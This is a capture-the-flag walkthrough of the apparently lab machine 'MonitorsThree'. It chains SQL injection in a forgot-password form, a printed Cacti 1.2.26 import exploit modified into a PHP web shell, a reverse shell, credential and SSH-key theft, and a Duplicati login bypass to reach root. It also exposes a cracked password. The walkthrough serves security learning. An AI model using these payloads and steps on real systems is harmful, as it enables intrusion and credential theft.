Doing the usual port scanning
We get the usual 22 ssh
, 80 http
but here we get a weird 8084
filtered port, we will put that for later.
Checking port 80
we get a redirection
Adding it to /etc/hosts
Having a domain, means that the machine can host another subdomain or a Vhost.
Doing Vhost fuzzing using gobuster
gobuster vhost -u="http://monitorsthree.htb" -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
We get a hit
Added to the /etc/hosts
Doing a directory fuzzing in the background while checking the website.
gobuster dir -u=http://monitorsthree.htb -w=/usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x txt,php,zip,html,db
Index page got nothing interesting but a single button (going with low hanging fruits) and of course source code has nothing interesting.
Checking the login
Trying default credentials led to nothing.
We have 2 interesting pages a login
and a forgot password
Checking the directory fuzzing, we get nothing really special but admin
that we can check later
Firing up burpsuite
to intercept the 2 requests and passing them to sqlmap
to automate the job
Opening burpsuite
, get to the proxy tab and open the intercept
his is the request of the login
And here is the request of the forgot_password
Copying them and saving them into 2 separates files
Passing them to sqlmap
in parallels to automate and speed things up
sqlmap -r reqLogin --batch --risk=3 --level=3
Same for the reqRecover
sqlmap -r reqRecover --batch --risk=3 --level=3
Trying at that time to manually do some sql injection payloads to speed things up.
Chose to begin with the forgot_password
Testing for a lot of injection payloads we always get the same error
Till we get something strange trying this payload 'sd -- -
Now we know how to inject new queries, by adding the prefix '
and the suffix -- -
but URL encoded of course from burspuite’s repeater.
Trying the famous 1=1
payload tr'OR+1=1+--+-+
Very weird…
Trying to reveal the number of columns using the order by
method tr'+ORDER+BY+20+--+-+
Trying to go lower till we reach this tr'+ORDER+BY+9+--+-+
Seems that this payload worked but it actually doesn’t display anything.
From this we can conclude that this is a blind error based or time based SQL injection with a prefix of '
and a suffix of -- -
and the vulnerable page is the forgot_password
Knowing that we can proceed with sqlmap
, stop the 2 processes and give sqlmap
some hints to speed things up a little bit
sqlmap -r req2 --batch --prefix="'" --suffix="-- -" --dbs --technique=BEU
And we get a hitt!! we discover the database monitorsthree_db
and ending up (after very very long time due to poor connection) extracting those findings.
Cracking the hash and we end up with the credentials admin:greencacti2001
Trying to login with those credentials to our admin panel
We logged in as admin but it led us to nowhere.
Time to check for our other Vhost cacti
application found with a version 1.2.26
A small search, a vulnerability was found this link explains the exploitation
Using this exploit here
$xmldata = "<xml>
$filedata = "<?php phpinfo(); ?>";
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");
Changing the filedata
variable to be
<?php system(\$_GET['cmd']); ?>
Run the POC
php poc.php
A zip file was generated
Logging in to the cacti dashboard using the same credentials
Following the POC, going to Import/Export
> Import Package
Select the test.xml.gz
file and import it
Follow the path given /var/www/html/cacti/resource/test.php
We get RCE
Using the
payload and URL encode it, open a NC listener, we get a connection
Upgrading the shell
Searching for Database credentials, we get a hit /var/www/html/cacti/lib/installer.php
Logging in with those credentials
www-data@monitorsthree:~/html/cacti$ mysql -u cactiuser -pcactiuser
Issuing the command show databases;
Then use cacti;
and issuing show tables;
We can see an interesting table user_auth
Issuing the command SELECT * FROM user_auth;
Found the password hash of the user marcus
which we disclosed being a user on the machine with the cat /etc/passwd
Cracking the hash using hashcat
we get the password in clear text
As SSH was open, we try to SSH but we get a public key error
This error mean that the machine does not support logging in using username:password
Logging in within our reverse shell and grabbing the private ssh key of the marcus user
Copying the key and ssh using the key from our local machine
The machine has a docker container
This explains the filtered
port we found on the port scanning step
Looking at the internal open ports
The high ports are more signs of a docker running.
Performing Local Port Forwarding using ssh
ssh -L 8200: marcus@monitorsthree.htb -i id_rsa
Checking the new service running on localhost:8200
service found running. A famous service for backup and storage solution.
A quick search, a vulnerability was found here
Following the explanation, we can find the database files
Downloading the files to our local machine and analyzing them, checking the Duplicati-server.sqlite
Checking the Option
We found the server-passphrase
the blog was referencing to.
Getting to the duplicati
platform, we give an arbitrary value for the password and intercept the request with burpsuite
Writing down the session-nonce
then open the console from the inspect
Writing down the payload
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
The saltedpwd
is the server-passphrase
but decoding it from base64
and then applying HEX
Applying the payload, we get a base64
Do not forget to URL decode the nonce
taken from the request.
Paste the password into the password
field and URL encode it. Forward the request
We bypassed the login page and authenticated
Now to be able to escalate privileges, and read the root files, we can do the following
as the local device is mounted in the source
folder in this docker image
to the path and select it
The machine was pawned successfully